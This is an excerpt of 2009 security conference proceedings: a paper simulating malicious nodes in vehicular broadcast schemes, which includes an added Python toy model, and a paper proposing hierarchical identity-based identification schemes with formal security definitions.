27. Mouheb, D., Talhi, C., Lima, V., Debbabi, M., Wang, L., Pourzandi, M.: Weaving security aspects into UML 2.0 design models. In: AOM 2009: Proceedings of the 13th Workshop on Aspect-Oriented Modeling, pp. 7–12. ACM, New York (2009)
28. Georg, G., Ray, I., Anastasakis, K., Bordbar, B., Toahchoodee, M., Houmb, S.H.: An aspect-oriented methodology for designing secure applications. Information and Software Technology 51(5), 846–864 (2009); Special Issue: Model-Driven Development for Secure Information Systems
29. Pavlich-Mariscal, J., Michel, L., Demurjian, S.: Enhancing UML to model custom security aspects. In: AOM 2007: Proceedings of the 11th Workshop on Aspect-Oriented Modeling (2007)
30. Braber, F., Hogganvik, I., Lund, M.S., Stølen, K., Vraalsen, F.: Model-based security analysis in seven steps — a guided tour to the CORAS method. BT Technology Journal 25(1), 101–117 (2007)
31. Myers, A.C.: JFlow: Practical Mostly-Static Information Flow Control. In: Proceedings of the 26th ACM Symposium on Principles of Programming Languages (POPL 1999), San Antonio (1999)
32. Zheng, L., Myers, A.C.: Dynamic security labels and static information flow control. International Journal of Information Security 6(2), 67–84 (2007)
Impact of Malicious Node on Broadcast Schemes Aneel Rahim and Fahad bin Muyaha PMC, King Saud University, Kingdom of Saudi Arabia
[email protected],
[email protected]
Abstract. Broadcast is a frequently used operation in vehicular ad hoc networks (VANETs) for sharing traffic, weather and safety information among vehicles. The relevance-based approach forwards high-priority traffic for information sharing and removes redundant and surplus messages. It depends on the intermediate nodes and assumes an ideal scenario with no selfish or malicious node, which is not possible in real life. In this paper we simulate the relevance-based approach using NS-2 in a realistic scenario, consider the impact of malicious nodes, and determine how much the network throughput is affected by them.
1 Introduction
A large number of broadcast techniques have been proposed for information sharing, but they are not appropriate for VANETs because of certain drawbacks. Simple flooding [1] suffers from redundant rebroadcasts, collision and contention. The probabilistic scheme [2] was proposed to overcome the problems of simple flooding, but its performance is poor in sparse networks, since nodes do not receive all messages unless the probability is high, and with a high probability it behaves like simple flooding. Neighbor-knowledge methods exchange hello packets to obtain neighbor information, and the hello packets degrade network performance: a short hello interval causes contention and collision, while a long interval hurts performance because of mobility [3]. Multi-hop vehicular broadcast [4] has a scalability problem. None of the existing techniques except the relevance-based approach considers the importance of a message. The relevance-based approach depends on the intermediate nodes for communication. All nodes in VANETs are assumed to be fair nodes [5] (they forward information to increase the global benefit regardless of their own benefit), but this is not possible in a real-life scenario. In this paper we simulate the relevance-based approach in a realistic scenario, consider the impact of malicious nodes on it, and determine how much the network throughput is affected.
This paper is organized as follows. In Section 2 we discuss the relevance-based approach, its characteristics and its implementation using a cross-layer design, 802.11e, and 802.11e with virtual queues. In Section 3 the proposed study and the results obtained with NS-2 are presented. Section 4 concludes.
D. Ślęzak et al. (Eds.):SecTech 2009, CCIS 58, pp. 86–92, 2009. © Springer-Verlag Berlin Heidelberg 2009
Impact of Malicious Node on Broadcast Schemes
87
2 Related Work
The relevance-based approach is the only scheme that forwards important and relevant messages for sharing and discards surplus messages [6]. Because of the high speed of vehicles, it is not possible for one vehicle to share all its information with the others; it can select only important and relevant messages for broadcast. The relevance-based approach consists of two steps: first, compute the relevance value of each data packet; second, forward messages according to their relevance value [5][9].
2.1 Characteristics of the Relevance-Based Approach
Altruism, application-oriented information differentiation and controlled unfairness are the basic characteristics of the relevance-based approach [5][7][8]. Altruism means that nodes are neither selfish nor malicious: they forward information to increase the global benefit regardless of their own benefit. Application-oriented information differentiation means that, whereas existing techniques rely on packet-specific data, application-level data is used to remove redundant and surplus information. Controlled unfairness means that messages are forwarded according to their priority rather than the time they have spent in the queue.
[Fig. 1 shows two vehicle protocol stacks side by side, each consisting of an Application Layer, a Link Layer whose queue is sorted by relevance value (13 8 7 5 2 in one node, 10 7 1 9 5 in the other), a Benefit Based Extension, and the MAC Layer.]
Fig. 1. Cross layer design for Relevance based approach
88
A. Rahim and F.b. Muyaha
2.2 Cross Layer Implementation
The cross-layer design is used to implement the relevance-based approach. The relevance of each message is calculated at the application layer, and that value is attached to the message header before the message is passed to the link layer. The benefit-based extension changes the functionality of the interface queue and of the medium access control so that messages are forwarded according to their priority, using the information obtained from the application layer through inter-layer communication, as shown in Fig. 1 [5][7].
2.3 802.11e Implementation
The relevance-based approach can also be implemented with the 802.11e protocol [8], but this is not suitable for the following reasons. First, the four queues of 802.11e do not re-sort the packets within a queue: packets are inserted into one of the four priority queues according to their relevance value, but dequeuing ignores the relevance value and follows FIFO order only. Second, there is no mechanism to assign a priority to a given packet, and sorting packets into only four queues is harmful because data packets with different relevance values end up in the same queue. Third, the global benefit decreases because packets of lower importance get the medium more often than packets with a high relevance value, as there is no internal contention among the four queues [5].
Fig. 2. 802.11e with virtual queue
2.4 802.11e Implementation with Virtual Queue
To overcome the above problems of 802.11e, four virtual queues are created at the application level. Packets first enter the virtual queues according to their priorities, and the virtual queues are kept sorted so that the most important messages are at their front. The length of each 802.11e queue is set to at most one, so only the most important and relevant message is passed to one of the 802.11e queues. If a message is already waiting in the 802.11e queue and a newly arriving message has a higher relevance value, the new message is placed in the 802.11e queue and the message already present, having the lower relevance value, is swapped back into the virtual queue, as shown in Fig. 2 [6].
3 Proposed Study and Results
In this study we simulate the relevance-based approach and calculate the global benefit in an ideal scenario, in which all nodes behave properly and there is no malicious node in the network. In the second scenario we consider the impact of malicious nodes and measure how much the global benefit decreases; these malicious nodes forward the relevant messages first but also inject some surplus information. In the last scenario the malicious nodes forward the surplus messages first and ignore the relevant messages. To validate the proposed study, we compare the performance of the relevance-based approach in the real and ideal scenarios with the 802.11e protocol. NS-2, a network simulator [10], is used to simulate the behavior of the relevance-based approach in VANET scenarios. We use the Manhattan mobility model, and traffic is generated by the Generic Mobility Simulation Framework [11]. Vehicles move at speeds of 72 km/h to 108 km/h within an area of 3000 m x 3000 m with a transmission range of 300 m. The performance of the relevance-based approach is measured by calculating the global benefit.
Table 1. Simulation Parameters
Parameter           Setting
Channel             wireless
Vehicles            100
MAC protocol        802.11e
Time                50 s
Routing protocol    DSDV
NS-2 is used for the simulation, and the parameters used in the following studies are given in Table 1.
3.1 Study 1
In this study, 100 vehicles move at high speed and exchange information, as shown in Fig. 3. We calculate the global benefit assuming that there is no malicious node in the network. The global benefit is the sum of all local benefits of the vehicles during the simulation. Only the relevant and safety messages are forwarded in the network, and nodes try to improve the network benefit regardless of their own benefit.
Fig. 3. Global Benefit with 100 vehicles in ideal scenario
3.2 Study 2
Fig. 4 shows the global benefit of the relevance-based approach under the impact of malicious nodes. The scenario is the same as above, with 100 vehicles, but now we consider the real scenario in which malicious nodes may affect network performance. As the relevance-based approach depends entirely on intermediate nodes, an intermediate node can be malicious and will badly decrease the global benefit. In this study the malicious nodes are intelligent: they inject surplus information into the network slowly, so they are not easily detected. They forward the relevant messages first and the irrelevant ones afterwards.
Fig. 4. Global Benefit with 100 vehicles in real scenario (intelligent malicious node)
3.3 Study 3
In this study the malicious nodes try to decrease network performance as much as possible. The scenario is again the same, with 100 vehicles. The global benefit measured in this study is considerably lower than in Studies 1 and 2, as shown in Fig. 5. The malicious nodes in this scenario forward the surplus messages first and assign the lower priority to safety messages using the 802.11e protocol.
Fig. 5. Global Benefit with 100 vehicles in real scenario
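A toy model of the three queueing disciplines of Sects. 2.2 to 2.4 and of the three node behaviours of Studies 1 to 3, as an added example; it is not the authors' NS-2 simulation. The arrival stream, the relevance ranges assumed for the four 802.11e queues, the transmit budget, and the way the malicious node tags or injects packets are all constructed here. Global benefit follows the paper's definition, the sum of the true relevance of the messages that reach the medium, with surplus messages contributing nothing.

```python
"""Toy model of the queueing disciplines of Sect. 2.2-2.4 and the three scenarios
of Sect. 3. Added example on constructed traffic, not the authors' NS-2 setup;
relevance values, tag bands and the transmit budget are assumptions."""
import heapq
from collections import deque
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Pkt:
    seq: int      # arrival order at the forwarding node
    value: int    # true relevance of the message; 0 marks surplus traffic
    tag: int = 0  # relevance value the forwarding node writes into the header


# --- forwarding policies of the intermediate node ---------------------------
def honest(pkts):
    """Study 1 (altruistic node): the header tag equals the true relevance."""
    return [replace(p, tag=p.value) for p in pkts]

def intelligent_malicious(pkts, every=4, fake_tag=8):
    """Study 2: correct tags, but after every `every` messages one surplus
    message carrying a plausible mid-range tag is slipped into the stream."""
    out, base = [], max(p.seq for p in pkts) + 1
    for i, p in enumerate(honest(pkts), 1):
        out.append(p)
        if i % every == 0:
            out.append(Pkt(base + i, 0, fake_tag))  # injected, no real benefit
    return out

def aggressive_malicious(pkts, top_tag=15):
    """Study 3: surplus traffic gets the highest tag, safety messages the lowest."""
    return [replace(p, tag=top_tag if p.value == 0 else 1) for p in pkts]


# --- queueing disciplines at the link/MAC layer -----------------------------
def relevance_sorted(pkts, budget):
    """Cross-layer design (Sect. 2.2): one interface queue re-sorted by tag."""
    return sorted(pkts, key=lambda p: (-p.tag, p.seq))[:budget]

BANDS = ((10, 99), (7, 9), (4, 6), (0, 3))  # assumed tag range of each 802.11e queue

def dot11e_fifo(pkts, budget, bands=BANDS):
    """Plain 802.11e (Sect. 2.3): four FIFO queues selected by tag band, highest
    band served first, no re-sorting inside a queue."""
    queues = [deque() for _ in bands]
    for p in pkts:
        queues[next(i for i, (lo, hi) in enumerate(bands) if lo <= p.tag <= hi)].append(p)
    sent = []
    while len(sent) < budget and any(queues):
        sent.append(next(q for q in queues if q).popleft())
    return sent

def dot11e_virtual(pkts, budget, arrivals_per_tx=2):
    """802.11e with virtual queues (Sect. 2.4): arrivals wait in a tag-sorted
    application-level queue, the MAC queue holds one packet, and an arrival with
    a higher tag swaps places with it. One transmit opportunity follows every
    `arrivals_per_tx` arrivals; leftover packets are drained at the end."""
    virtual, sent, slot = [], [], None  # virtual: heap on (-tag, seq); slot: MAC packet

    def transmit():
        nonlocal slot
        if slot is not None and len(sent) < budget:
            sent.append(slot)
            slot = None
        if slot is None and virtual:
            slot = heapq.heappop(virtual)[2]

    for n, p in enumerate(pkts, 1):
        if slot is None:
            slot = p
        elif p.tag > slot.tag:  # swap: the waiting MAC packet is demoted
            heapq.heappush(virtual, (-slot.tag, slot.seq, slot))
            slot = p
        else:
            heapq.heappush(virtual, (-p.tag, p.seq, p))
        if n % arrivals_per_tx == 0:
            transmit()
    while slot is not None and len(sent) < budget:
        transmit()
    return sent

def global_benefit(sent):
    """Sum of the true relevance of what reached the medium; surplus adds nothing."""
    return sum(p.value for p in sent)


# Constructed arrival stream: the queue contents of Fig. 1 plus two surplus messages.
ARRIVALS = [Pkt(s, v) for s, v in enumerate([13, 8, 7, 5, 2, 10, 0, 7, 1, 9, 0, 5])]
POLICIES = {"honest": honest, "intelligent": intelligent_malicious,
            "aggressive": aggressive_malicious}
DISCIPLINES = {"sorted": relevance_sorted, "802.11e": dot11e_fifo,
               "virtual": dot11e_virtual}

def run_scenarios(budget=5):
    """Global benefit for every (policy, discipline) pair when the medium
    carries `budget` transmissions."""
    return {(pn, dn): global_benefit(disc(policy(ARRIVALS), budget))
            for pn, policy in POLICIES.items() for dn, disc in DISCIPLINES.items()}
```

With a budget of five transmissions, `run_scenarios()` reproduces the pattern of Figs. 3 to 5 on this toy input: for the honest node the re-sorted queue and the virtual-queue variant forward the five highest relevance values (benefit 47) while plain 802.11e sends a 7 ahead of the 9 queued behind it in the same band (45); the intelligent node's injected packets displace genuinely relevant ones under every discipline (40, 38 and 31); and the aggressive node pushes the two surplus messages to the front and relegates the safety messages (28, 28 and 33). The disciplines differ in how they order packets, but all of them trust the relevance value in the header, which at a malicious intermediate node is attacker-controlled.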
92
A. Rahim and F.b. Muyaha
4 Conclusion
The relevance-based approach relies on intermediate nodes for communication and therefore assumes that no selfish node exists in the network, which is not possible in a real scenario. In this paper we simulated the relevance-based approach, considered the impact of selfish and malicious nodes, and determined that the global benefit decreases gradually as malicious nodes are taken into account.
Acknowledgments This research was supported by the Prince Muqrin Chair (PMC) for IT Security at King Saud University, Riyadh, Saudi Arabia.
References
1. Ni, S.-Y., Tseng, Y.-C., Chen, Y.-S., Sheu, J.-P.: The broadcast storm problem in mobile ad hoc networks. In: Proc. ACM MobiCom 1999, Seattle, USA (August 1999)
2. Williams, B., Camp, T.: Comparison of Broadcasting Techniques for Mobile Ad Hoc Networks. In: ACM MOBIHOC (2002)
3. Yoo, J., Gil, H.-r., Kim, C.-k.: INK: Implicit Neighbor Knowledge Routing in Ad Hoc Networks. IEEE, Los Alamitos (2003)
4. Osafune, T., Lin, L., Lenardi, M.: Multi-Hop Vehicular Broadcast (MHVB). In: 6th International Conference on ITS Telecommunications (2006)
5. Kosch, T., Adler, C.J., Eichler, S., Schroth, C., Strassberger, M.: The scalability problem of vehicular ad hoc networks and how to solve it. IEEE Wireless Communications (October 2006)
6. Rahim, A., Yasin, M., Ahmad, I., Khan, Z.S., Sher, M.: Relevance Based Approach with Virtual Queue Using 802.11e Protocol for Vehicular Adhoc Networks. In: 2nd International Conference on Computer, Control and Communication, Karachi, February 14 (2009)
7. Eichler, S., Schroth, C., Kosch, T., Strassberger, M.: Strategies for context-adaptive message dissemination in vehicular ad hoc networks. In: Second International Workshop on Vehicle-to-Vehicle Communications (July 2006)
8. Schroth, C., Eigner, R., Eichler, S., Strassberger, M.: A Framework for Network Utility Maximization in VANETs. In: International Conference on Mobile Computing and Networking, USA, September 29. ACM, New York (2006)
9. Adler, C., Eichler, S., Kosch, T., Schroth, C., Strassberger, M.: Self-organized and Context-Adaptive Information Diffusion in Vehicular Ad Hoc Networks. In: 3rd International Symposium on Wireless Communication Systems, ISWCS 2006 (2006)
10. Network Simulator, ns-2, http://www.isi.edu/nsnam/ns
11. Baumann, R., Legendre, F., Sommer, P.: Generic Mobility Simulation Framework (GMSF). In: MobilityModels 2008, Hong Kong SAR, China, May 26. ACM, New York (2008)
Hierarchical Identity-Based Identification Schemes
Ji-Jian Chin (1), Swee-Huay Heng (2), and Bok-Min Goi (3)
(1) Research Group for Cryptography and Information Security (RGCIS), Faculty of Engineering, Multimedia University, Cyberjaya, 63000 Selangor, Malaysia, [email protected]
(2) Research Group for Cryptography and Information Security (RGCIS), Faculty of Information Science and Technology, Multimedia University, Jalan Ayer Keroh Lama, 75450 Melaka, Malaysia, [email protected]
(3) Faculty of Engineering and Science, Universiti Tunku Abdul Rahman, Kuala Lumpur Campus, Malaysia, [email protected]
Abstract. Hierarchical identity-based cryptography was introduced to reduce the burden on a single Private Key Generator (PKG) and to limit damage to only those domains whose lower-level PKGs are compromised. However, until now only security models and concrete schemes for hierarchical identity-based encryption and signature schemes are found in the literature. In this paper, we propose the initial idea of hierarchical identity-based identification (HIBI) schemes. We provide the formal definition and security model for HIBI schemes and then propose a concrete HIBI scheme secure against passive attacks in the random oracle model under the Computational Diffie-Hellman assumption. We also prove the HIBI scheme secure against active and concurrent attacks in the random oracle model under the One-More Computational Diffie-Hellman assumption.
Keywords: Hierarchical, Identity-based, Identification Scheme, Random Oracle Model.
1 Introduction
1.1 Background
Identity-based (ID-based) cryptography began with Shamir's initial paper [15] in 1984. Using a user's identity string as the public key, one can eliminate the need for public key certificates. However, only recently were practical and provably secure schemes developed, by Boneh and Franklin [4] and Waters [16]. In [9], Horwitz and Lynn presented the idea of hierarchical ID-based cryptography. They proposed a two-level hierarchical ID-based encryption (HIBE) scheme with total collusion resistance at the upper level and partial collusion resistance at the lower level, proving it secure under the Bilinear Diffie-Hellman (BDH) assumption in the random oracle model. Shortly after, Gentry and Silverberg [8] followed with a HIBE scheme that is practical, fully scalable, totally collusion resistant and chosen-ciphertext secure in the random oracle model assuming the hardness of the BDH problem, building on the Boneh-Franklin ID-based encryption (IBE) scheme. The same authors also proposed a hierarchical ID-based signature (HIBS) scheme using the same constructs. In [18], Yao et al. modified the Gentry-Silverberg HIBE to include the forward-secure property proposed by Canetti, Halevi and Katz in [7]. Recently, HIBE schemes secure in the standard model were proposed in [5,6,14].
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 93–99, 2009. © Springer-Verlag Berlin Heidelberg 2009
An identification scheme allows one party (the prover) to prove the authenticity of his or her identity to another party (the verifier) without revealing any information about the prover's secret. ID-based identification (IBI) schemes, where users employ identity strings instead of certificates, were first formalized independently in [1] and [10]. The security proofs of the IBI schemes in these two papers are given in the random oracle model. A random oracle is an idealized hash function that answers every new query with a uniformly random string (long enough to be truncated to any desired length); it is used in cryptographic proofs when no practical function is known to provide the mathematical properties the proof requires [3]. IBI schemes secure in the standard model were later proposed in [11,12,13]. A general framework for IBI construction was also proposed in [17].
1.2 Our Contribution
In this paper, we combine the idea of hierarchical ID-based cryptography with standard identification schemes, proposing the idea of hierarchical ID-based identification (HIBI) schemes. We formalize the definition and security model for HIBI schemes and then provide a concrete HIBI scheme based on the Gentry-Silverberg HIBE scheme. We prove the proposed HIBI scheme secure in the random oracle model against passive attacks based on the intractability of the Computational Diffie-Hellman problem, and secure in the random oracle model against active and concurrent attacks based on the intractability of the One-More Computational Diffie-Hellman problem.
1.3 Why HIBI?
The need for HIBI schemes parallels the motivation given by Gentry and Silverberg for HIBE schemes [8]. HIBI takes the burden off a single Private Key Generator (PKG) in a large network of users: the root PKG can delegate key generation and identity authentication to lower-level PKGs. This also eases the private key distribution problem and improves the scalability of conventional IBI schemes. In HIBI, damage is also restricted to the domain of the compromise: compromise of a domain PKG's secret affects only its own local nodes, while higher-level PKGs are not affected. HIBI schemes are naturally applicable to most organizations, since most organizations have hierarchies. Another application is letting a single user create temporary session keys whose compromise does not affect the other users in the system that are his or her peers. The certificate-free nature of HIBI makes it even more appealing, since one does not need to worry about processing, managing or distributing certificates as the hierarchy grows.
Section 2 gives the preliminaries and notation used throughout this paper. We describe the formal definition and security model of HIBI schemes in Section 3, and then present our scheme in Section 4. We provide the security and efficiency analysis in Section 5 and conclude in Section 6.
2 Preliminaries
Let $k$ denote the security parameter. We say that $\varepsilon(k)$ is negligible if $\varepsilon(k)$ approaches zero faster than $1/k^{c}$ for any constant $c > 0$.
2.1 Bilinear Pairings
Let $G$ and $G_T$ be finite cyclic groups of prime order $q$ and let $g$ be a generator of $G$. The map $e : G \times G \to G_T$ is said to be an admissible map if it satisfies the following three conditions:
1. Bilinearity. $e(g^{a}, g^{b}) = e(g, g)^{ab}$ for all $a, b \in \mathbb{Z}_q$.
2. Non-degeneracy. $e(g, g) \neq 1$.
3. Efficient computability. $e$ can be computed efficiently.
2.2 Computational Diffie-Hellman Problem (CDHP)
Let $G$ be a multiplicative cyclic group generated by $g$ with prime order $q$. The CDHP is: given $(g, g^{a}, g^{b})$, compute $g^{ab}$. We say that the CDHP is $(t, \varepsilon)$-hard in $G$ if $\Pr[A \text{ solves CDHP}] \le \varepsilon$ for any $A$ that runs in time $t$.
2.3 One-More Computational Diffie-Hellman Problem (OMCDHP)
One-More problems were first introduced to the area of identification schemes in [2], to prove the security of the GQ and Schnorr identification schemes. The OMCDHP was first used in the area of IBI to prove pairing-based IBI schemes secure against active and concurrent attacks in the random oracle model in [10] and [1]. The definition of the OMCDHP follows [1].
3 Hierarchical Identity-Based Identification
We define a user's position in the hierarchy by its tuple of IDs $(\mathrm{ID}_1, \ldots, \mathrm{ID}_l)$, where the root PKG is $\mathrm{ID}_0$ and the user's ancestors have the ID-tuples $(\mathrm{ID}_1, \ldots, \mathrm{ID}_i)$ for $1 \le i < l$.
3.1 Definition
A HIBI scheme is defined by five probabilistic polynomial-time algorithms:
1. Root Setup (RS). RS takes a security parameter $k$ and returns the system parameters params and a root-level master secret rlmsk. It publishes params, which includes a description of $G$ and $G_T$, while rlmsk is kept secret.
2. Lower-Level Setup (LLS). Lower-level PKGs take the description of $G$ and $G_T$ from params and generate a domain-level secret dlmsk.
3. Extract (E). RS with ID-tuple $\mathrm{ID}_0$, or LLS with ID-tuple $(\mathrm{ID}_1, \ldots, \mathrm{ID}_l)$, runs E on input params and rlmsk (for the root PKG) or dlmsk (for a lower-level PKG) and generates a public Q-value and the corresponding user secret key usk for its child with ID-tuple $(\mathrm{ID}_1, \ldots, \mathrm{ID}_{l+1})$.
4. Identification Protocol. When a user wants to prove itself, it runs Prove (P) on params and usk and interacts with the verifier's Verify (V) algorithm in a canonical three-move protocol:
 (a) Commitment. P sends a commitment CMT to V.
 (b) Challenge. V sends a challenge CHA drawn from a predefined set.
 (c) Response. P returns a response RST, after which V either accepts or rejects.
3.2 Security Model
For HIBI, impersonation remains the main adversarial goal: an impersonator succeeds if, interacting with the verifier in the role of a prover with ID-tuple$_i$ but without usk$_i$, it convinces the verifier to accept. The adversaries of HIBI are the same as for conventional IBI. The passive attacker eavesdrops on conversations between an honest prover and a verifier. The active/concurrent attacker interacts with honest provers as a cheating verifier before attempting impersonation; the concurrent attacker may interact with multiple provers at once.
We describe the security of a HIBI scheme with the following game between an impersonator I and a challenger. In Setup, the challenger takes a security parameter $k$, gives the resulting params to I and keeps rlmsk to itself. In Phase 1, I issues queries $q_1, \ldots, q_m$, where each $q_i$ is either a private key query or an identification query. For a private key query on ID-tuple$_i$, the challenger runs E and returns usk$_i$ to I. For an identification query, the challenger returns a transcript of an interaction between prover and verifier (passive I) or acts as the prover while I plays a cheating verifier (active/concurrent I). In the challenge phase, I outputs an ID-tuple$^{*} \notin \{\text{ID-tuple}_i\}$ that it wishes to impersonate. In Phase 2, I may continue to query the private keys of ID-tuple$_i$ as long as ID-tuple$_i$ is neither an ancestor of ID-tuple$^{*}$ nor equal to ID-tuple$^{*}$. I may also continue to request transcripts (passive I) or identification interactions (active/concurrent I) for ID-tuple$^{*}$ or any ancestor of ID-tuple$^{*}$. Finally, in the impersonation phase, I plays the cheating prover against the verifier and wins if it is accepted with non-negligible probability.
We say a HIBI scheme is $(t, q_E, \varepsilon)$-secure under passive (imp-pa) or active/concurrent (imp-aa/ca) attacks if for any passive or active/concurrent impersonator I running in time $t$, $\Pr[\text{I impersonates successfully}] < \varepsilon$, where I makes at most $q_E$ extract queries.
4 Construction
In this section, we propose our concrete, efficient and provably secure HIBI scheme. Our scheme naturally extends the single-tier IBI scheme proposed in [10] to a hierarchy using the techniques of [8]. Let Level$_i$ denote the set of entities at level $i$, with Level$_0 = \{\mathrm{RootPKG}\}$. Let $G$ and $G_T$ be finite multiplicative cyclic groups of large prime order $q$ and let $e : G \times G \to G_T$ be an efficiently computable bilinear map. Let $H : \{0,1\}^{*} \to G$ be a hash function mapping an arbitrary bit string to an element of $G$; $H$ is treated as a random oracle in the security analysis. Following the notation of [8], $Q_i = g_0^{s_i}$ denotes the public value derived from the secret $s_i$ of the level-$i$ PKG.
1. Root Setup: Select a random generator $g_0 \in G$ and a secret $s_0 \in \mathbb{Z}_q$. Set $Q_0 = g_0^{s_0}$ and publish params $= (G, G_T, e, H, g_0, Q_0)$ while keeping $s_0$ secret.
2. Lower-Level Setup: Entity $\mathrm{ID}_l$ picks a random $s_l \in \mathbb{Z}_q$ and keeps it secret.
3. Extract: For an entity $\mathrm{ID}_l$ in Level$_l$ with ID-tuple $(\mathrm{ID}_1, \ldots, \mathrm{ID}_l)$, where $(\mathrm{ID}_1, \ldots, \mathrm{ID}_i)$ for $1 \le i \le l$ is the ID-tuple of $\mathrm{ID}_l$'s ancestor at Level$_i$, the parent $\mathrm{ID}_{l-1}$ runs Extract by
 (a) computing $g_l = H(\mathrm{ID}_1, \ldots, \mathrm{ID}_l)$ and $Q_{l-1} = g_0^{s_{l-1}}$,
 (b) calculating $\mathrm{ID}_l$'s usk as $S_l = S_{l-1} \cdot g_l^{\,s_{l-1}}$ (with $S_0$ the identity element of $G$), and
 (c) giving $\mathrm{ID}_l$ the tuple $(\mathbf{g}, \mathbf{Q})$ with $\mathbf{g} = \{g_1, \ldots, g_l\}$ and $\mathbf{Q} = \{Q_0, \ldots, Q_{l-1}\}$, and usk $= S_l$.
4. Identification Protocol: For an entity $\mathrm{ID}_l$ with ID-tuple $(\mathrm{ID}_1, \ldots, \mathrm{ID}_l)$ proving itself to a verifier,
 (a) the Prover takes input $(\mathbf{g}, \mathbf{Q}, S_l)$, generates a random $r \in \mathbb{Z}_q$, computes $X = \{X_1, \ldots, X_l\} = \{g_1^{\,r}, \ldots, g_l^{\,r}\}$ and sends $X$ to the Verifier;
 (b) the Verifier picks a random challenge $c \in \mathbb{Z}_q$ and sends it to the Prover;
 (c) the Prover calculates $Z = S_l^{\,r+c}$ and sends $Z$ as its response;
 (d) the Verifier accepts if $e(g_0, Z) = \prod_{i=1}^{l} e(Q_{i-1}, X_i \cdot g_i^{\,c})$.
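Correctness of the acceptance test in step 4(d), written out here as an added check rather than taken from the paper: with $S_0$ the identity element and $Q_{i-1} = g_0^{s_{i-1}}$ the public value of the level-$(i-1)$ PKG, the user secret key unrolls to $S_l = \prod_{i=1}^{l} g_i^{\,s_{i-1}}$, so for an honest prover

$$
e(g_0, Z) = e\Big(g_0, \prod_{i=1}^{l} g_i^{\,s_{i-1}(r+c)}\Big) = \prod_{i=1}^{l} e(g_0, g_i)^{s_{i-1}(r+c)} = \prod_{i=1}^{l} e\big(g_0^{\,s_{i-1}}, g_i^{\,r} g_i^{\,c}\big) = \prod_{i=1}^{l} e\big(Q_{i-1}, X_i \cdot g_i^{\,c}\big),
$$

each equality using the bilinearity of $e$. The verifier needs only the public $Q_{i-1}$ and the hashes $g_i = H(\mathrm{ID}_1, \ldots, \mathrm{ID}_i)$ of the prover's ancestors, which is where the $l$ hash evaluations and $l+1$ pairings of the Verify column in Table 1 come from.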
5 Security Analysis
5.1 Security against Passive Attacks
Theorem 1. If the CDH problem is $(t', \varepsilon')$-hard, then the HIBI scheme is $(t, q_E, \varepsilon)$-secure against passive attacks, where $t' = O(t)$ and $\varepsilon \le \varepsilon' \big(e\,(q_E\,l + l)\big)^{l} + \frac{1}{q}$.
5.2 Security against Active and Concurrent Attacks
Theorem 2. If the OMCDH problem is $(t', q_{CDH}, \varepsilon')$-hard, then the HIBI scheme is $(t, q_E, \varepsilon)$-secure against active and concurrent attacks, where $t' = O(t)$ and $\varepsilon \le \varepsilon' \big(e\,(q_E\,l + l)\big)^{l} + \frac{1}{q}$.
The detailed proofs of Theorems 1 and 2 can be found in the full paper.
5.3 Efficiency Analysis
Our scheme has a private key size of one group element. The public key and parameters consist of the descriptions of the groups $G$ and $G_T$, the pairing $e$ and a hash function into $G$. We give the complexity cost of each algorithm in Table 1, where $l$ is the depth of the prover in the hierarchy.
Table 1. Complexity cost for each algorithm in the proposed HIBI scheme
                  Setup   Extract   Prove   Verify
Hashing             0        1        l        l
Multiplication      0        1        0        l
Exponentiation      1        1      l + 1      l
Pairing             0        0        0      l + 1
Efficiency can be improved using a concept similar to the Dual method proposed in [8] for Dual-Identity-Based Encryption and Dual-Identity-Based Signatures.
6 Conclusion
We proposed the formal definition and security model for HIBI schemes. We also constructed a concrete and efficient HIBI scheme that is imp-pa secure based on the intractability of the CDHP and imp-aa/ca secure based on the intractability of the OMCDHP in the random oracle model.
References
1. Bellare, M., Namprempre, C., Neven, G.: Security proofs for identity-based identification and signature schemes. In: Cachin, C., Camenisch, J.L. (eds.) EUROCRYPT 2004. LNCS, vol. 3027, pp. 268–286. Springer, Heidelberg (2004)
2. Bellare, M., Palacio, A.: GQ and Schnorr identification schemes: proofs of security against impersonation under active and concurrent attacks. In: Yung, M. (ed.) CRYPTO 2002. LNCS, vol. 2442, pp. 162–177. Springer, Heidelberg (2002)
3. Bellare, M., Rogaway, P.: Random oracles are practical: a paradigm for designing efficient protocols. In: 1st ACM Conference on Computer and Communications Security, pp. 62–73. ACM Press, New York (1993)
4. Boneh, D., Franklin, M.: Identity-based encryption from the Weil pairing. In: Kilian, J. (ed.) CRYPTO 2001. LNCS, vol. 2139, pp. 213–229. Springer, Heidelberg (2001)
5. Boneh, D., Boyen, X., Goh, E.-J.: Hierarchical identity-based encryption with constant size ciphertext. In: Cramer, R. (ed.) EUROCRYPT 2005. LNCS, vol. 3494, pp. 440–456. Springer, Heidelberg (2005)
6. Boyen, X., Waters, B.: Anonymous hierarchical identity-based encryption without random oracles. In: Dwork, C. (ed.) CRYPTO 2006. LNCS, vol. 4117, pp. 290–307. Springer, Heidelberg (2006)
7. Canetti, R., Halevi, S., Katz, J.: A forward-secure public-key encryption scheme. In: Biham, E. (ed.) EUROCRYPT 2003. LNCS, vol. 2656, pp. 255–271. Springer, Heidelberg (2003)
8. Gentry, C., Silverberg, A.: Hierarchical ID-based cryptography. In: Zheng, Y. (ed.) ASIACRYPT 2002. LNCS, vol. 2501, pp. 548–566. Springer, Heidelberg (2002)
9. Horwitz, J., Lynn, B.: Towards hierarchical identity-based encryption. In: Knudsen, L.R. (ed.) EUROCRYPT 2002. LNCS, vol. 2332, pp. 466–481. Springer, Heidelberg (2002)
10. Kurosawa, K., Heng, S.-H.: From digital signature to ID-based identification/signature. In: Bao, F., Deng, R., Zhou, J. (eds.) PKC 2004. LNCS, vol. 2947, pp. 248–261. Springer, Heidelberg (2004)
11. Kurosawa, K., Heng, S.-H.: Identity-based identification without random oracles. In: Gervasi, O., Gavrilova, M.L., Kumar, V., Laganà, A., Lee, H.P., Mun, Y., Taniar, D., Tan, C.J.K. (eds.) ICCSA 2005. LNCS, vol. 3481, pp. 603–613. Springer, Heidelberg (2005)
12. Kurosawa, K., Heng, S.-H.: The power of identification schemes. In: Yung, M., Dodis, Y., Kiayias, A., Malkin, T.G. (eds.) PKC 2006. LNCS, vol. 3958, pp. 364–377. Springer, Heidelberg (2006)
13. Kurosawa, K., Heng, S.-H.: The power of identification schemes. International Journal of Applied Cryptography 1(1), 60–69 (2008)
14. Sarkar, P., Chatterjee, S.: Trading time for space: Towards an efficient IBE scheme with short(er) public parameters in the standard model. In: Won, D.H., Kim, S. (eds.) ICISC 2005. LNCS, vol. 3935, pp. 424–440. Springer, Heidelberg (2006)
